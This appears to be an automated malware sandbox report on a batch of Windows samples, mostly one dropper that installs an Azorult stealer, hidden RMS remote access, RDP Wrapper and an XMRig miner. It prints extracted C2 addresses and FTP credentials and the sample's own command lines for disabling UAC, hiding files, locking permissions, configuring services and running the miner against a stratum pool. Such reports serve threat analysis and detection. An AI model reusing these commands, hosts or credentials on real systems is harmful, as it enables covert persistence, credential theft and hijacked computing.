Analysis
max time kernel: 1804s
max time network: 1816s
platform: windows10_x64
resource: win10v20201028
submitted: 19-11-2020 13:14
Static task: static1
Behavioral tasks (all run on resource win10v20201028):
- behavioral1: 08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.dll
- behavioral2: 0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe
- behavioral3: 1.bin/1.exe
- behavioral4: 2019-09-02_22-41-10.exe
- behavioral5: 2b5e50bc3077610128051bc3e657c3f0e331fb8fed2559c6596911890ea866ba.dll
- behavioral6: 2c01b007729230c415420ad641ad92eb.exe
- behavioral7: 31.exe
- behavioral8: 3DMark 11 Advanced Edition.exe
- behavioral9: 42f972925508a82236e8533567487761.exe
- behavioral10: 42f972925508a82236e8533567487761(1).exe
- behavioral11: 5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
- behavioral12: 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
- behavioral13: 6a9e7107c97762eb1196a64baeadb291.exe
- behavioral14: 905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe
- behavioral15: 948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe
- behavioral16: 95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.dll
- behavioral17: Archive.zip__ccacaxs2tbz2t6ob3e.exe
- behavioral18: CVE-2018-15982_PoC.swf
- behavioral19: CVWSHSetup[1].bin/WSHSetup[1].exe
- behavioral20: DiskInternals_Uneraser_v5_keygen.exe
- behavioral21: ForceOp 2.8.7 - By RaiSence.exe
- behavioral22: HYDRA.exe
- behavioral23: KLwC6vii.exe
- behavioral24: Keygen.exe
- behavioral25: Lonelyscreen.1.2.9.keygen.by.Paradox/Lonelyscreen.1.2.9.keygen.by.Paradox.exe
- behavioral26: LtHv0O2KZDK4M637.exe
- behavioral27: Magic_File_v3_keygen_by_KeygenNinja.exe
- behavioral28: OnlineInstaller.exe
- behavioral29: Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
- behavioral30: SecuriteInfo.com.Gen.NN.ZexaF.34108.xy1@amqiedE.17985.exe
- behavioral31: SecuriteInfo.com.Generic.mg.cde56cf0169830ee.29869.dll
General
Malware Config
Extracted: Protocol: ftp - Host: 109.248.203.81 - Port: 21 - Username: alex - Password: easypassword
Extracted: azorult - http://195.245.112.115/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Modifies visibility of hidden/system files in Explorer 2 TTPs
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
Processes:
resource: yara_rule
- behavioral26/files/0x000100000001abe6-33.dat: acprotect
- behavioral26/files/0x000100000001abe5-32.dat: acprotect
-
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
TTPs:
-
XMRig Miner Payload 2 IoCs
Processes:
resource: yara_rule
- behavioral26/files/0x000200000001abeb-758.dat: xmrig
- behavioral26/files/0x000200000001abeb-764.dat: xmrig
-
Processes:
resource: yara_rule
- behavioral26/files/0x000100000001abe3-19.dat: aspack_v212_v242
- behavioral26/files/0x000100000001abe3-18.dat: aspack_v212_v242
- behavioral26/files/0x000100000001abe3-28.dat: aspack_v212_v242
- behavioral26/files/0x000100000001abe3-30.dat: aspack_v212_v242
- behavioral26/files/0x000100000001abe3-31.dat: aspack_v212_v242
- behavioral26/files/0x000200000001a50e-34.dat: aspack_v212_v242
- behavioral26/files/0x000200000001a50e-37.dat: aspack_v212_v242
- behavioral26/files/0x000200000001a50e-38.dat: aspack_v212_v242
- behavioral26/files/0x000200000001a50e-140.dat: aspack_v212_v242
-
Blocks application from running via registry modification
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 4 IoCs
Processes:
- File opened for modification: C:\Windows\SysWOW64\drivers\conhost.exe (taskhost.exe)
- File opened for modification: C:\Windows\System32\drivers\etc\hosts (LtHv0O2KZDK4M637.exe)
- File opened for modification: C:\Windows\System32\drivers\etc\hosts (cmd.exe)
- File created: C:\Windows\SysWOW64\drivers\conhost.exe (taskhost.exe)
-
Executes dropped EXE 20 IoCs
Processes:
pid / process:
- 912 wini.exe
- 2176 winit.exe
- 3628 rutserv.exe
- 2972 sys.exe
- 504 rutserv.exe
- 696 rutserv.exe
- 2276 rutserv.exe
- 2072 rfusclient.exe
- 2272 rfusclient.exe
- 372 rfusclient.exe
- 2196 cheat.exe
- 1696 taskhost.exe
- 1296 taskhostw.exe
- 360 R8.exe
- 1732 winlogon.exe
- 4332 Rar.exe
- 4224 RDPWInst.exe
- 4480 RDPWInst.exe
- 2428 audiodg.exe
- 5208 MicrosoftHost.exe
-
Modifies Windows Firewall 1 TTPs
TTPs:
-
Registers new Print Monitor 2 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Processes:
resource: yara_rule
- behavioral26/files/0x000100000001abe6-33.dat: upx
- behavioral26/files/0x000100000001abe5-32.dat: upx
- behavioral26/files/0x000200000001abf1-269.dat: upx
- behavioral26/files/0x000200000001abf1-268.dat: upx
-
Loads dropped DLL 5 IoCs
Processes:
pid / process:
- 2972 sys.exe (four IoCs)
- 4664 svchost.exe
-
Modifies file permissions 1 TTPs 64 IoCs
Processes:
process: icacls.exe, 64 instances, pids 5908, 2256, 5768, 3420, 816, 6076, 5176, 5344, 4176, 5356, 5444, 5652, 4616, 1056, 5876, 4376, 3924, 5688, 5332, 5984, 5388, 3956, 4808, 5764, 5264, 6056, 6096, 5540, 4380, 5620, 4356, 5676, 4420, 4580, 3980, 5304, 6044, 5936, 5076, 4520, 5952, 4764, 6100, 5576, 5312, 5300, 1764, 5296, 3892, 4840, 5832, 5244, 5272, 5424, 6084, 5956, 5380, 5484, 5592, 5520, 6068, 6060, 2704, 2652
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
- Key created: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run (LtHv0O2KZDK4M637.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" (LtHv0O2KZDK4M637.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (taskhostw.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" (taskhostw.exe)
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
TTPs:
-
Processes:
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (LtHv0O2KZDK4M637.exe)
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
TTPs:
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow / ioc:
- 6 ip-api.com
-
Modifies WinLogon 2 TTPs 7 IoCs
Processes:
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" (RDPWInst.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList (LtHv0O2KZDK4M637.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts (LtHv0O2KZDK4M637.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" (LtHv0O2KZDK4M637.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList (LtHv0O2KZDK4M637.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts (LtHv0O2KZDK4M637.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" (LtHv0O2KZDK4M637.exe)
-
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource: yara_rule
- behavioral26/files/0x000100000001abe4-8.dat: autoit_exe
- behavioral26/files/0x000100000001abe4-9.dat: autoit_exe
-
Drops file in Program Files directory 31 IoCs
Processes:
- File opened for modification: C:\Program Files (x86)\GRIZZLY Antivirus (taskhost.exe)
- File opened for modification: C:\Program Files (x86)\Panda Security (taskhost.exe)
- File opened for modification: C:\Program Files\ESET (attrib.exe)
- File opened for modification: C:\Program Files\AVAST Software\Avast (attrib.exe)
- File created: C:\Program Files\RDP Wrapper\rdpwrap.ini (RDPWInst.exe)
- File opened for modification: C:\Program Files (x86)\360 (taskhost.exe)
- File opened for modification: C:\Program Files (x86)\SpyHunter (taskhost.exe)
- File opened for modification: C:\Program Files\COMODO (taskhost.exe)
- File opened for modification: C:\Program Files\Malwarebytes\Anti-Malware (attrib.exe)
- File opened for modification: C:\Program Files\RDP Wrapper\rdpwrap.ini (attrib.exe)
- File opened for modification: C:\Program Files (x86)\Microsoft JDX (taskhost.exe)
- File opened for modification: C:\Program Files\Malwarebytes (taskhost.exe)
- File opened for modification: C:\Program Files\Kaspersky Lab (taskhost.exe)
- File opened for modification: C:\Program Files\Cezurity (taskhost.exe)
- File opened for modification: C:\Program Files\SpyHunter (taskhost.exe)
- File opened for modification: C:\Program Files\AVG (taskhost.exe)
- File opened for modification: C:\Program Files (x86)\Kaspersky Lab (taskhost.exe)
- File opened for modification: C:\Program Files (x86)\Cezurity (taskhost.exe)
- File opened for modification: C:\Program Files\RDP Wrapper (attrib.exe)
- File opened for modification: C:\Program Files (x86)\AVAST Software (taskhost.exe)
- File opened for modification: C:\Program Files\ESET (taskhost.exe)
- File opened for modification: C:\Program Files (x86)\Zaxar (taskhost.exe)
- File created: C:\Program Files\Common Files\System\iexplore.exe (taskhost.exe)
- File opened for modification: C:\Program Files\ByteFence (taskhost.exe)
- File opened for modification: C:\Program Files\Enigma Software Group (taskhost.exe)
- File opened for modification: C:\Program Files\AVAST Software (taskhost.exe)
- File opened for modification: C:\Program Files (x86)\AVG (taskhost.exe)
- File created: C:\Program Files\RDP Wrapper\rdpwrap.dll (RDPWInst.exe)
- File opened for modification: C:\Program Files\RDP Wrapper\rdpwrap.dll (attrib.exe)
- File created: C:\Program Files\Common Files\System\iediagcmd.exe (taskhost.exe)
- File opened for modification: C:\Program Files\360\Total Security (attrib.exe)
-
Drops file in Windows directory 8 IoCs
Processes:
- File opened for modification: C:\Windows\java.exe (taskhost.exe)
- File opened for modification: C:\WINDOWS\McMwt (attrib.exe)
- File created: C:\Windows\boy.exe (taskhost.exe)
- File opened for modification: C:\Windows\boy.exe (taskhost.exe)
- File created: C:\Windows\svchost.exe (taskhost.exe)
- File opened for modification: C:\Windows\svchost.exe (taskhost.exe)
- File opened for modification: C:\Windows\NetworkDistribution (taskhost.exe)
- File created: C:\Windows\java.exe (taskhost.exe)
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 (spoolsv.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 (spoolsv.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 (spoolsv.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 (spoolsv.exe)
- Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID (spoolsv.exe)
- Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID (spoolsv.exe)
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (sys.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (winit.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (winit.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (sys.exe)
-
Delays execution with timeout.exe 9 IoCs
Processes:
process: timeout.exe, 9 instances, pids 4552, 5596, 5924, 3452, 3968, 5064, 5776, 2204, 1268
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
pid / process:
- 4660 ipconfig.exe
-
Kills process with taskkill 6 IoCs
Processes:
process: taskkill.exe, 6 instances, pids 1288, 2016, 4500, 5944, 5384, 5440
-
Modifies data under HKEY_USERS 18 IoCs
Processes:
All entries by spoolsv.exe:
- Key created: \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts
- Set value (str): \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:"
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45"
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices
- Set value (str): \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:"
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:"
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45"
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:"
- Key created: \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices
- Set value (str): \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45"
- Set value (str): \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45"
- Set value (str): \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:"
- Set value (str): \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45"
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Devices
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:"
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45"
-
Modifies registry class 6 IoCs
Processes:
- Key created: \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\MIME\Database (winit.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset (winit.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage (winit.exe)
- Key created: \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings (R8.exe)
- Key created: \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings (cmd.exe)
- Key created: \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings (wini.exe)
-
NTFS ADS 2 IoCs
Processes:
- File opened for modification: C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 (taskhostw.exe)
- File opened for modification: C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ (LtHv0O2KZDK4M637.exe)
-
Runs .reg file with regedit 2 IoCs
Processes:
pid / process:
- 2060 regedit.exe
- 1428 regedit.exe
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid / process:
- 1192 LtHv0O2KZDK4M637.exe (all 64 IoCs)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid / process:
- 1296 taskhostw.exe
-
Suspicious behavior: LoadsDriver 3 IoCs
Processes:
pid / process:
- 620 (three IoCs; no process name recorded)
-
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
pid / process:
- 372 rfusclient.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
- rutserv.exe (pid 3628): Token: SeDebugPrivilege
- rutserv.exe (pid 696): Token: SeDebugPrivilege
- rutserv.exe (pid 2276): Token: SeTakeOwnershipPrivilege; Token: SeTcbPrivilege; Token: SeTcbPrivilege
- LtHv0O2KZDK4M637.exe (pid 1192): Token: SeDebugPrivilege; Token: SeDebugPrivilege; and 57 further entries whose token field was recorded only as a raw numeric value: 9800651925390289900, 9800658522458876690, 9800665119528512256, 9800687109789641548, 9800702502950726298, 9800712398553737857, 9800717896110762672, 9800725592690911909, 9800727791712725727, 9800754179988122135, 9800760777056709125, 9800773971226389081, 9800797060966313368, 9800799259989175698, 9800803658034900366, 9800817951684685217, 9800927902860307709, 9800945495043206157, 9800955390545292328, 9800983479627672679, 9800987276376928147, 9801108222667910857, 9801113720224935672, 9801119217783271147, 9801132411919396367, 9801139009021537853, 9801147805114035749, 9801166496807186024, 9801175292899680656, 9801178591433056649, 9801179690944356748, 9801185188501643711, 9801189586548416939, 9801203880195842498, 9801204979708453313, 9801217074334065126, 9801220372867440927, 9801230268471238970, 9801237965083894063, 9801240164107804961, 9801248960198205769, 9801264353359290727, 9801284144564002985, 9801288542610776229, 9801298438213525696, 9801302836258201852, 867634522891771310, 85899345940, 0, 274877907072, 0, 9920249032593447144, 9920249032593447144, 0, 9920249032593447144, 6937813002834471071, 6937813002834471071
-
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
pid / process:
- 2176 winit.exe
- 3628 rutserv.exe
- 504 rutserv.exe
- 696 rutserv.exe
- 2276 rutserv.exe
- 428 WinMail.exe
- 2872 WinMail.exe
- 1696 taskhost.exe
- 1296 taskhostw.exe
- 360 R8.exe
- 1732 winlogon.exe
- 2428 audiodg.exe
- 5208 MicrosoftHost.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Source PID (process) wrote to memory of target PID (process); each pair was recorded three times unless noted:
- 1192 (LtHv0O2KZDK4M637.exe) wrote to memory of 912 (wini.exe)
- 912 (wini.exe) wrote to memory of 2912 (WScript.exe)
- 912 (wini.exe) wrote to memory of 2176 (winit.exe)
- 2912 (WScript.exe) wrote to memory of 3556 (cmd.exe)
- 3556 (cmd.exe) wrote to memory of 2060 (regedit.exe)
- 3556 (cmd.exe) wrote to memory of 1428 (regedit.exe)
- 3556 (cmd.exe) wrote to memory of 2204 (timeout.exe)
- 3556 (cmd.exe) wrote to memory of 3628 (rutserv.exe)
- 1192 (LtHv0O2KZDK4M637.exe) wrote to memory of 2972 (sys.exe)
- 3556 (cmd.exe) wrote to memory of 504 (rutserv.exe)
- 3556 (cmd.exe) wrote to memory of 696 (rutserv.exe)
- 2276 (rutserv.exe) wrote to memory of 2272 (rfusclient.exe)
- 2276 (rutserv.exe) wrote to memory of 2072 (rfusclient.exe)
- 3556 (cmd.exe) wrote to memory of 3712 (attrib.exe)
- 3556 (cmd.exe) wrote to memory of 3796 (attrib.exe)
- 3556 (cmd.exe) wrote to memory of 2372 (sc.exe)
- 3556 (cmd.exe) wrote to memory of 2780 (sc.exe)
- 3556 (cmd.exe) wrote to memory of 2012 (sc.exe)
- 2972 (sys.exe) wrote to memory of 3504 (cmd.exe)
- 3504 (cmd.exe) wrote to memory of 3452 (timeout.exe)
- 2176 (winit.exe) wrote to memory of 428 (WinMail.exe)
- 428 (WinMail.exe) wrote to memory of 2872 (WinMail.exe) (recorded once)
-
System policy modification 1 TTPs 3 IoCs
TTPs:
Processes:
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (LtHv0O2KZDK4M637.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (LtHv0O2KZDK4M637.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" (LtHv0O2KZDK4M637.exe)
-
Views/modifies file attributes 1 TTPs 31 IoCs
Processes:
process: attrib.exe, 31 instances, pids 5164, 5432, 4196, 4240, 5260, 1264, 5168, 5732, 5352, 1156, 5548, 5536, 1452, 5672, 5564, 3712, 812, 5480, 5516, 2784, 5492, 5220, 1124, 3796, 5396, 5040, 1636, 1688, 2052, 1444, 5820
Processes (one per line: image path | command line | sandbox signatures, where any fired)
Notes: rutserv.exe, rfusclient.exe and the RManService service belong to the RMS (Remote Manipulator System) remote-administration tool, installed silently here and given the display name "Microsoft Framework". RDPWInst.exe is the RDP Wrapper installer. The MicrosoftHost.exe command line carries cryptocurrency-miner arguments (a stratum+tcp pool URL and a donate level). Localized names in the net and icacls arguments are the Russian, Polish and Spanish names of the Administrators, Remote Desktop Users and Remote Management Users groups and of the SYSTEM account, left exactly as the sample issued them; stray trailing quotes in some sc commands are also the sample's own.
- C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe | "C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe" | Drops file in Drivers directory; Adds Run key to start application; Checks whether UAC is enabled; Modifies WinLogon; NTFS ADS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory; System policy modification
- C:\ProgramData\Microsoft\Intel\wini.exe | C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui | Executes dropped EXE; Modifies registry class; Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs" | Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" " | Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\regedit.exe | regedit /s "reg1.reg" | Runs .reg file with regedit
- C:\Windows\SysWOW64\regedit.exe | regedit /s "reg2.reg" | Runs .reg file with regedit
- C:\Windows\SysWOW64\timeout.exe | timeout 2 | Delays execution with timeout.exe
- C:\ProgramData\Windows\rutserv.exe | rutserv.exe /silentinstall | Executes dropped EXE; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
- C:\ProgramData\Windows\rutserv.exe | rutserv.exe /firewall | Executes dropped EXE; Suspicious use of SetWindowsHookEx
- C:\ProgramData\Windows\rutserv.exe | rutserv.exe /start | Executes dropped EXE; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
- C:\Windows\SysWOW64\attrib.exe | ATTRIB +H +S C:\Programdata\Windows\*.* | Views/modifies file attributes
- C:\Windows\SysWOW64\attrib.exe | ATTRIB +H +S C:\Programdata\Windows | Views/modifies file attributes
- C:\Windows\SysWOW64\sc.exe | sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
- C:\Windows\SysWOW64\sc.exe | sc config RManService obj= LocalSystem type= interact type= own
- C:\Windows\SysWOW64\sc.exe | sc config RManService DisplayName= "Microsoft Framework"
- C:\ProgramData\Windows\winit.exe | "C:\ProgramData\Windows\winit.exe" | Executes dropped EXE; Checks processor information in registry; Modifies registry class; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
- C:\Program Files (x86)\Windows Mail\WinMail.exe | "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE | Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
- C:\Program Files\Windows Mail\WinMail.exe | "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE | Suspicious use of SetWindowsHookEx
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
- C:\Windows\SysWOW64\timeout.exe | timeout 5 | Delays execution with timeout.exe
- C:\ProgramData\install\sys.exe | C:\ProgramData\install\sys.exe | Executes dropped EXE; Loads dropped DLL; Checks processor information in registry; Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe" | Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\timeout.exe | C:\Windows\system32\timeout.exe 3 | Delays execution with timeout.exe
- C:\programdata\install\cheat.exe | C:\programdata\install\cheat.exe -pnaxui | Executes dropped EXE
- C:\ProgramData\Microsoft\Intel\taskhost.exe | "C:\ProgramData\Microsoft\Intel\taskhost.exe" | Drops file in Drivers directory; Executes dropped EXE; Drops file in Program Files directory; Drops file in Windows directory; Suspicious use of SetWindowsHookEx
- C:\Programdata\RealtekHD\taskhostw.exe | C:\Programdata\RealtekHD\taskhostw.exe | Executes dropped EXE; Adds Run key to start application; NTFS ADS; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of SetWindowsHookEx
- C:\Programdata\WindowsTask\winlogon.exe | C:\Programdata\WindowsTask\winlogon.exe | Executes dropped EXE; Suspicious use of SetWindowsHookEx
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /C schtasks /query /fo list
- C:\Windows\SysWOW64\schtasks.exe | schtasks /query /fo list
- C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ipconfig /flushdns
- C:\Windows\system32\ipconfig.exe | ipconfig /flushdns | Gathers network information
- C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c gpupdate /force
- C:\Windows\system32\gpupdate.exe | gpupdate /force
- C:\ProgramData\WindowsTask\audiodg.exe | C:\ProgramData\WindowsTask\audiodg.exe | Executes dropped EXE; Suspicious use of SetWindowsHookEx
- C:\ProgramData\WindowsTask\MicrosoftHost.exe | C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://fontdrvhost.ru:3333 -u CPU --donate-level=1 -k -t1 | Executes dropped EXE; Suspicious use of SetWindowsHookEx
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
- C:\Windows\SysWOW64\icacls.exe | icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
- C:\Windows\SysWOW64\icacls.exe | icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
- C:\Windows\SysWOW64\icacls.exe | icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F) | Modifies file permissions
- C:\programdata\microsoft\intel\R8.exe | C:\programdata\microsoft\intel\R8.exe | Executes dropped EXE; Modifies registry class; Suspicious use of SetWindowsHookEx
- C:\Windows\SysWOW64\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
- C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" " | Modifies registry class
